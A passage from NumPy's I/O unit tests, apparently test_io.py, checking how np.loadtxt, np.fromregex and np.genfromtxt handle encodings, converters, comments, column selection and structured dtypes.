nonascii = b'\xc3\xb6\xc3\xbc\xc3\xb6'.decode("UTF-8")
with temppath() as path:
with open(path, "wb") as f:
f.write(nonascii.encode("UTF-16"))
x = self.loadfunc(path, encoding="UTF-16", dtype=np.unicode)
assert_array_equal(x, nonascii)
def test_binary_decode(self):
utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
v = self.loadfunc(BytesIO(utf16), dtype=np.unicode, encoding='UTF-16')
assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))
def test_converters_decode(self):
# test converters that decode strings
c = TextIO()
c.write(b'\xcf\x96')
c.seek(0)
x = self.loadfunc(c, dtype=np.unicode,
converters={0: lambda x: x.decode('UTF-8')})
a = np.array([b'\xcf\x96'.decode('UTF-8')])
assert_array_equal(x, a)
def test_converters_nodecode(self):
# test native string converters enabled by setting an encoding
utf8 = b'\xcf\x96'.decode('UTF-8')
with temppath() as path:
with io.open(path, 'wt', encoding='UTF-8') as f:
f.write(utf8)
x = self.loadfunc(path, dtype=np.unicode,
converters={0: lambda x: x + 't'},
encoding='UTF-8')
a = np.array([utf8 + 't'])
assert_array_equal(x, a)
class TestLoadTxt(LoadTxtBase):
loadfunc = staticmethod(np.loadtxt)
def setup(self):
# lower chunksize for testing
self.orig_chunk = np.lib.npyio._loadtxt_chunksize
np.lib.npyio._loadtxt_chunksize = 1
def teardown(self):
np.lib.npyio._loadtxt_chunksize = self.orig_chunk
def test_record(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = TextIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = TextIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = TextIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = TextIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = TextIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments_unicode(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=u'#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_comments_byte(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=b'#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_comments_multiple(self):
c = TextIO()
c.write('# comment\n1,2,3\n@ comment2\n4,5,6 // comment3')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=['#', '@', '//'])
a = np.array([[1, 2, 3], [4, 5, 6]], int)
assert_array_equal(x, a)
def test_comments_multi_chars(self):
c = TextIO()
c.write('/* comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments='/*')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
# Check that '/*' is not transformed to ['/', '*']
c = TextIO()
c.write('*/ comment\n1,2,3,5\n')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, dtype=int, delimiter=',',
comments='/*')
def test_skiprows(self):
c = TextIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Testing with an integer instead of a sequence
for int_type in [int, np.int8, np.int16,
np.int32, np.int64, np.uint8, np.uint16,
np.uint32, np.uint64]:
to_read = int_type(1)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=to_read)
assert_array_equal(x, a[:, 1])
# Testing with some crazy custom integer type
class CrazyInt(object):
def __index__(self):
return 1
crazy_int = CrazyInt()
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=crazy_int)
assert_array_equal(x, a[:, 1])
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(crazy_int,))
assert_array_equal(x, a[:, 1])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = TextIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(arr['stid'], [b"JOE", b"BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
# Testing non-ints in usecols
c.seek(0)
bogus_idx = 1.5
assert_raises_regex(
TypeError,
'^usecols must be.*%s' % type(bogus_idx),
np.loadtxt, c, usecols=bogus_idx
)
assert_raises_regex(
TypeError,
'^usecols must be.*%s' % type(bogus_idx),
np.loadtxt, c, usecols=[0, bogus_idx, 0]
)
def test_fancy_dtype(self):
c = TextIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0,
[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_str_dtype(self):
# see gh-8033
c = ["str1", "str2"]
for dt in (str, np.bytes_):
a = np.array(["str1", "str2"], dtype=dt)
x = np.loadtxt(c, dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
with suppress_warnings() as sup:
sup.filter(message="loadtxt: Empty input file:")
c = TextIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = TextIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
# Test using an explicit dtype with an object
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
tgt = (9223372043271415339, 9223372043271415853)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_from_float_hex(self):
# IEEE doubles and floats only, otherwise the float32
# conversion may fail.
tgt = np.logspace(-10, 10, 5).astype(np.float32)
tgt = np.hstack((tgt, -tgt)).astype(float)
inp = '\n'.join(map(float.hex, tgt))
c = TextIO()
c.write(inp)
for dt in [float, np.float32]:
c.seek(0)
res = np.loadtxt(c, dtype=dt)
assert_equal(res, tgt, err_msg="%s" % dt)
def test_from_complex(self):
tgt = (complex(1, 1), complex(1, -1))
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=complex)
assert_equal(res, tgt)
def test_complex_misformatted(self):
# test for backward compatibility
# some complex formats used to generate x+-yj
a = np.zeros((2, 2), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re - 1.0j * im
c = BytesIO()
np.savetxt(c, a, fmt='%.16e')
c.seek(0)
txt = c.read()
c.seek(0)
# misformat the sign on the imaginary part, gh 7895
txt_bad = txt.replace(b'e+00-', b'e00+-')
assert_(txt_bad != txt)
c.write(txt_bad)
c.seek(0)
res = np.loadtxt(c, dtype=complex)
assert_equal(res, a)
def test_universal_newline(self):
with temppath() as name:
with open(name, 'w') as f:
f.write('1 21\r3 42\r')
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
def test_empty_field_after_tab(self):
c = TextIO()
c.write('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t')
c.seek(0)
dt = {'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([b'start ', b' ', b''])
assert_array_equal(x['comment'], a)
def test_structure_unpack(self):
txt = TextIO("M 21 72\nF 35 58")
dt = {'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([72., 58.]))
def test_ndmin_keyword(self):
c = TextIO()
c.write('1,2,3\n4,5,6')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
d = TextIO()
d.write('0,1,2')
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = TextIO()
e.write('0\n1\n2')
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
# Test ndmin kw with empty file.
with suppress_warnings() as sup:
sup.filter(message="loadtxt: Empty input file:")
f = TextIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
def count():
for i in range(10):
yield "%d" % i
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
def test_bad_line(self):
c = TextIO()
c.write('1 2 3\n4 5 6\n2 3')
c.seek(0)
# Check for exception and that exception contains line number
assert_raises_regex(ValueError, "3", np.loadtxt, c)
def test_none_as_string(self):
# gh-5155, None should work as string when format demands it
c = TextIO()
c.write('100,foo,200\n300,None,400')
c.seek(0)
dt = np.dtype([('x', int), ('a', 'S10'), ('y', int)])
np.loadtxt(c, delimiter=',', dtype=dt, comments=None) # Should succeed
@pytest.mark.skipif(locale.getpreferredencoding() == 'ANSI_X3.4-1968',
reason="Wrong preferred encoding")
def test_binary_load(self):
butf8 = b"5,6,7,\xc3\x95scarscar\n\r15,2,3,hello\n\r"\
b"20,2,3,\xc3\x95scar\n\r"
sutf8 = butf8.decode("UTF-8").replace("\r", "").splitlines()
with temppath() as path:
with open(path, "wb") as f:
f.write(butf8)
with open(path, "rb") as f:
x = np.loadtxt(f, encoding="UTF-8", dtype=np.unicode)
assert_array_equal(x, sutf8)
# test broken latin1 conversion people now rely on
with open(path, "rb") as f:
x = np.loadtxt(f, encoding="UTF-8", dtype="S")
x = [b'5,6,7,\xc3\x95scarscar', b'15,2,3,hello', b'20,2,3,\xc3\x95scar']
assert_array_equal(x, np.array(x, dtype="S"))
def test_max_rows(self):
c = TextIO()
c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
max_rows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_max_rows_with_skiprows(self):
c = TextIO()
c.write('comments\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=2)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
assert_array_equal(x, a)
def test_max_rows_with_read_continuation(self):
c = TextIO()
c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
max_rows=2)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
assert_array_equal(x, a)
# test continuation
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([2,1,4,5], int)
assert_array_equal(x, a)
def test_max_rows_larger(self):
#test max_rows > num rows
c = TextIO()
c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=6)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8], [2, 1, 4, 5]], int)
assert_array_equal(x, a)
class Testfromregex(object):
def test_record(self):
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
def test_record_unicode(self):
utf8 = b'\xcf\x96'
with temppath() as path:
with open(path, 'wb') as f:
f.write(b'1.312 foo' + utf8 + b' \n1.534 bar\n4.444 qux')
dt = [('num', np.float64), ('val', 'U4')]
x = np.fromregex(path, r"(?u)([0-9.]+)\s+(\w+)", dt, encoding='UTF-8')
a = np.array([(1.312, 'foo' + utf8.decode('UTF-8')), (1.534, 'bar'),
(4.444, 'qux')], dtype=dt)
assert_array_equal(x, a)
regexp = re.compile(r"([0-9.]+)\s+(\w+)", re.UNICODE)
x = np.fromregex(path, regexp, dt, encoding='UTF-8')
assert_array_equal(x, a)
def test_compiled_bytes(self):
regexp = re.compile(b'(\\d)')
c = BytesIO(b'123')
dt = [('num', np.float64)]
a = np.array([1, 2, 3], dtype=dt)
x = np.fromregex(c, regexp, dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(LoadTxtBase):
loadfunc = staticmethod(np.genfromtxt)
def test_record(self):
# Test w/ explicit dtype
data = TextIO('1 2\n3 4')
test = np.genfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = TextIO('M 64.0 75.0\nF 25.0 60.0')
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.genfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
# Test outputting a standard ndarray
data = TextIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.genfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
# Test squeezing to 1D
control = np.array([1, 2, 3, 4], int)
#
data = TextIO('1\n2\n3\n4\n')
test = np.genfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = TextIO('1,2,3,4\n')
test = np.genfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
# Test the stripping of comments
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = TextIO('# comment\n1,2,3,5\n')
test = np.genfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = TextIO('1,2,3,5# comment\n')
test = np.genfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
# Test row skipping
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=',')
#
data = TextIO('comment\n1,2,3,5\n')
test = np.genfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = TextIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
with suppress_warnings() as sup:
sup.filter(ConversionWarning)
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
TextIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(TextIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(
TextIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
# Test retrieving a header
data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, dtype=None, names=True)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = {'gender': np.array([b'M', b'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
# Test the automatic definition of the output dtype
data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = [np.array([b'A', b'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
# Tests whether the output dtype can be uniformized
data = TextIO('1 2 3 4\n5 6 7 8\n')
test = np.genfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
# Check that a nested dtype isn't MIA
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.genfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
# Test overwriting the names of the dtype
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.genfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
# Check that names can be retrieved even if the line is commented out.
data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test, ctrl)
def test_names_and_comments_none(self):
# Tests case when names is true but comments is None (gh-10780)
data = TextIO('col1 col2\n 1 2\n 3 4')
test = np.genfromtxt(data, dtype=(int, int), comments=None, names=True)
control = np.array([(1, 2), (3, 4)], dtype=[('col1', int), ('col2', int)])
assert_equal(test, control)
def test_file_is_closed_on_error(self):
# gh-13200
with tempdir() as tmpdir:
fpath = os.path.join(tmpdir, "test.csv")
with open(fpath, "wb") as f:
f.write(u'\N{GREEK PI SYMBOL}'.encode('utf8'))
# ResourceWarnings are emitted from a destructor, so won't be
# detected by regular propagation to errors.
with assert_no_warnings():
with pytest.raises(UnicodeDecodeError):
np.genfromtxt(fpath, encoding="ascii")
def test_autonames_and_usecols(self):
# Tests names and usecols
data = TextIO('A B C D\n aaaa 121 45 9.1')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
# Test the combination user-defined converters and usecol
data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.genfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
# Tests names and usecols
data = TextIO('A B C D\n aaaa 121 45 9.1')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None,
converters={'C': lambda s: 2 * int(s)})
assert_(w[0].category is np.VisibleDeprecationWarning)
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
# Test the conversion to datetime.
converter = {
'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.genfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
# Test the conversion to datetime64.
converter = {
'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.genfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
# Test whether unused converters are forgotten
data = TextIO("1 21\n 3 42\n")
test = np.genfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.genfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x: float((b'r' in x.lower() and x.split()[-1]) or
(b'r' not in x.lower() and x.strip() or 0.0))
strip_per = lambda x: float((b'%' in x.lower() and x.split()[0]) or
(b'%' not in x.lower() and x.strip() or 0.0))
s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(
converters={2: strip_per, 3: strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
# Test some corner cases
s = TextIO('q1,2\nq3,4')
cnv = lambda s: float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0: cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.genfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.genfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_converters_and_usecols(self):
dstr = "1,5,-1,1:1\n2,8,-1,1:n\n3,3,-2,m:n\n"
dmap = {'1:1':0, '1:n':1, 'm:1':2, 'm:n':3}
dtyp = [('e1','i4'),('e2','i4'),('e3','i2'),('n', 'i1')]
conv = {0: int, 1: int, 2: int, 3: lambda r: dmap[r.decode()]}
test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
names=None, converters=conv)
control = np.rec.array([(1,5,-1,0), (2,8,-1,1), (3,3,-2,3)], dtype=dtyp)
assert_equal(test, control)
dtyp = [('e1','i4'),('e2','i4'),('n', 'i1')]
test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
usecols=(0,1,3), names=None, converters=conv)
control = np.rec.array([(1,5,0), (2,8,1), (3,3,3)], dtype=dtyp)
assert_equal(test, control)
def test_dtype_with_object(self):
# Test using an explicit dtype with an object
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', object)]
